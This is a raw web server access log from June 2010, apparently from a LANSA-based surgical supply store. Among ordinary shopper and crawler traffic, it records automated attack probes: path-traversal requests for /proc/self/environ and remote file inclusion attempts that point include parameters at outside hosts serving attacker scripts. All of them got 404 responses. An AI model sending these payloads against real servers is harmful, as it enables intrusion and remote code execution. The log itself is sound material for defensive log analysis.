121.78.118.123 - - [23/Jun/2010:07:03:19 -0400] "GET /logs/access_log.Q110060600/////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
64.91.250.11 - - [23/Jun/2010:07:03:20 -0400] "GET /logs/access_log.Q109100400%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:03:20 -0400] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:03:20 -0400] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:03:20 -0400] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:03:20 -0400] "GET /logs/access_log.Q109100400%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:03:22 -0400] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:03:22 -0400] "GET /logs/error_log.Q109100400////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:03:24 -0400] "GET /logs/error_log.Q109100400////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:03:26 -0400] "GET /logs/access_log.Q109091600%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:03:27 -0400] "GET /logs/access_log.Q109091600%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.54.22.2 - - [23/Jun/2010:07:03:27 -0400] "GET /logs/access_log.Q110061100/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:03:28 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:03:28 -0400] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
163.20.26.5 - - [23/Jun/2010:07:03:34 -0400] "GET /logs/error_log.Q110061200//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
163.20.26.5 - - [23/Jun/2010:07:03:37 -0400] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
163.20.26.5 - - [23/Jun/2010:07:03:38 -0400] "GET /logs//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
163.20.26.5 - - [23/Jun/2010:07:04:20 -0400] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
74.54.22.2 - - [23/Jun/2010:07:04:21 -0400] "GET /logs/access_log.Q110061100/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:04:21 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:04:21 -0400] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
163.20.26.5 - - [23/Jun/2010:07:04:28 -0400] "GET /logs/access_log.Q110061100//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
163.20.26.5 - - [23/Jun/2010:07:04:50 -0400] "GET /logs/error_log.Q110061200//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
163.20.26.5 - - [23/Jun/2010:07:04:50 -0400] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
74.54.22.2 - - [23/Jun/2010:07:04:53 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:05:06 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
66.249.71.27 - - [23/Jun/2010:07:05:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L02033C553C6439008590094+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.225.141.62 - - [23/Jun/2010:07:05:48 -0400] "GET //include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:05:48 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:05:48 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:05:49 -0400] "GET //include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:05:49 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:05:49 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:05:50 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:05:50 -0400] "GET //include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:05:50 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
163.20.26.5 - - [23/Jun/2010:07:06:09 -0400] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
163.20.26.5 - - [23/Jun/2010:07:06:17 -0400] "GET //index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
163.20.26.5 - - [23/Jun/2010:07:06:18 -0400] "GET /logs//index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
74.54.22.2 - - [23/Jun/2010:07:06:18 -0400] "GET /logs/access_log.Q110053000/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
67.225.141.62 - - [23/Jun/2010:07:06:25 -0400] "GET /logs/error_log.Q109091600//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:06:25 -0400] "GET /logs/error_log.Q109091600//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:06:27 -0400] "GET /logs/error_log.Q109091600//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:06:44 -0400] "GET //include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:06:44 -0400] "GET /logs/error_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:06:44 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:06:44 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:06:44 -0400] "GET //include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:06:44 -0400] "GET /logs/error_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:06:44 -0400] "GET //include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:06:44 -0400] "GET /logs/error_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:06:44 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
74.54.22.2 - - [23/Jun/2010:07:06:52 -0400] "GET /logs/access_log.Q110053000/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
85.244.10.86 - - [23/Jun/2010:07:07:29 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 77252 "http://www.acesurgical.com/connect_seminars.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:31 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:07:33 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
74.54.22.2 - - [23/Jun/2010:07:07:43 -0400] "GET /logs/access_log.Q110061500/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:07:43 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:07:43 -0400] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
67.225.141.62 - - [23/Jun/2010:07:07:46 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:07:47 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:07:48 -0400] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.244.10.86 - - [23/Jun/2010:07:07:49 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:08:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L028ABF6C4394F700510C007+M37+ENG HTTP/1.1" 200 59326 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:08:25 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028ABF6C4394F700510C007+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:08:27 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028ABF6C4394F700510C007+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
85.244.10.86 - - [23/Jun/2010:07:08:27 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L028ABF6C4394F700510C007+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; pt-pt) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
95.108.245.251 - - [23/Jun/2010:07:09:02 -0400] "GET /logs/error_log.Q109112600 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
74.54.22.2 - - [23/Jun/2010:07:09:17 -0400] "GET /logs/access_log.Q110060700/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:09:42 -0400] "GET /logs/access_log.Q110053000/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:09:42 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:09:43 -0400] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
69.175.59.242 - - [23/Jun/2010:07:09:59 -0400] "GET /logs/access_log.Q110021000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:10 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:10 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:10:10 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
121.78.118.123 - - [23/Jun/2010:07:10:11 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.78.118.123 - - [23/Jun/2010:07:10:12 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
